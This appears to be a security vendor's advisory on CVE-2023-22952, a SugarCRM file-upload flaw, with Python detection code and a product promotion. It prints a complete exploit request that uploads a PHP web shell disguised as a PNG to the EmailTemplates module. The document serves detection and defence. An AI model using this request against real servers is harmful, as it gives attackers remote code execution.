SugarCRM Shell File Upload (CVE-2023-22952)


Application Details

SugarCRM is an open source customer relationship management suite.


Vulnerability

SugarCRM versions up to 12.2.0 suffer from a remote shell upload vulnerability. Because of improper input validation, SugarCRM could allow a remote authenticated attacker to execute arbitrary code on the system.


Identification

By sending a specially crafted request to the EmailTemplates module, an attacker could exploit this vulnerability to execute arbitrary PHP code on the system.


POST /index.php HTTP/1.1
Host: 192.168.74.130:8080
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 577
Content-Type: multipart/form-data; boundary=24dca17724a5bf7732b724ccdaa83abd

--24dca17724a5bf7732b724ccdaa83abd
Content-Disposition: form-data; name="module"

EmailTemplates
--24dca17724a5bf7732b724ccdaa83abd
Content-Disposition: form-data; name="action"

AttachFiles
--24dca17724a5bf7732b724ccdaa83abd
Content-Disposition: form-data; name="file"; filename="sweet.phar"
Content-Type: image/png

.PNG
.
...
IHDR.............O.f....KPLTE<?php echo "#####"; passthru(base64_decode($_POST["c"])); echo "#####"; ?> ..x7...	pHYs..........+.....*IDAT(.c`.
...YX..98..yx......ED..%.h..C...0..-L.Z.....IEND.B`.
--24dca17724a5bf7732b724ccdaa83abd--

Detection

By turning this into a traffic file and matching rule, we are able to detect attempts to execute arbitrary code on the system.
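As an added illustration of that detection idea (not Idappcom's signature or traffic file, and not code from the SugarCRM project), the following Python checks a captured POST for the pattern shown above: module=EmailTemplates, action=AttachFiles, and a file part whose filename, declared Content-Type or body points at PHP rather than an image. The request bytes, the host name and the file body are constructed here, with a harmless PHP comment in place of the real payload.

```python
import re
# Constructed sample: same module/action/filename layout as the request above, harmless PHP comment as the file body
B = b"24dca17724a5bf7732b724ccdaa83abd"
SAMPLE_REQUEST = (
    b"POST /index.php HTTP/1.1\r\nHost: crm.example.test\r\nContent-Type: multipart/form-data;"
    b" boundary=" + B + b"\r\n\r\n--" + B + b'\r\nContent-Disposition: form-data; name="module"'
    b"\r\n\r\nEmailTemplates\r\n--" + B + b'\r\nContent-Disposition: form-data; name="action"'
    b"\r\n\r\nAttachFiles\r\n--" + B + b'\r\nContent-Disposition: form-data; name="file"; '
    b'filename="sweet.phar"\r\nContent-Type: image/png\r\n\r\n\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR'
    b"<?php /* marker */ ?>IEND\r\n--" + B + b"--\r\n"
)
EXEC_EXTS = {b"php", b"phar", b"phtml", b"php5"}  # extensions a PHP engine will execute
IMAGE_EXTS = {b"png", b"jpg", b"jpeg", b"gif"}
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)  # PHP open tag anywhere in the upload body

def parse_multipart(body: bytes, boundary: bytes) -> list[dict]:
    # Split a multipart/form-data body into dicts with name, filename, ctype and raw data
    parts = []
    for chunk in body.split(b"--" + boundary):
        if chunk.startswith(b"\r\n"):  # skips the preamble and the closing "--" marker
            raw_headers, _, data = chunk[2:].partition(b"\r\n\r\n")
            hdrs = {k.strip().lower(): v.strip() for k, _, v in
                    (line.partition(b":") for line in raw_headers.split(b"\r\n"))}
            disp = hdrs.get(b"content-disposition", b"")
            name = re.search(rb'(?:^|[;\s])name="([^"]*)"', disp)
            fname = re.search(rb'filename="([^"]*)"', disp)
            parts.append({"name": name.group(1) if name else b"", "filename": fname.group(1) if fname else None,
                          "ctype": hdrs.get(b"content-type", b""), "data": data.removesuffix(b"\r\n")})
    return parts

def inspect_request(raw: bytes) -> list[str]:
    # Findings for a POST that matches the EmailTemplates/AttachFiles upload pattern, else []
    head, _, body = raw.partition(b"\r\n\r\n")
    m = re.search(rb'(?im)^content-type:\s*multipart/form-data;.*boundary=([^\s;"]+)', head)
    if not head.startswith(b"POST ") or not m:
        return []
    parts = parse_multipart(body, m.group(1))
    fields = {p["name"]: p["data"] for p in parts if p["filename"] is None}
    if fields.get(b"module") != b"EmailTemplates" or fields.get(b"action") != b"AttachFiles":
        return []
    findings = []
    for p in (p for p in parts if p["filename"] is not None):
        ext = p["filename"].rsplit(b".", 1)[-1].lower()
        if ext in EXEC_EXTS:
            findings.append(f"upload filename has executable extension .{ext.decode()}")
        if p["ctype"].startswith(b"image/") and ext not in IMAGE_EXTS:
            findings.append(f"declared {p['ctype'].decode()} does not match extension .{ext.decode()}")
        if PHP_TAG.search(p["data"]):
            findings.append("PHP open tag embedded in uploaded file body")
    return findings
```

A genuine PNG attached under the same module and action produces no findings, so the check keys on the upload content rather than on the request path alone.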


Coverage

Idappcom has created signature 8023455 along with a traffic file for this vulnerability.


Traffic IQ

If you are concerned that your business may be at risk from this vulnerability or others, why not try out our Traffic IQ software, which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional
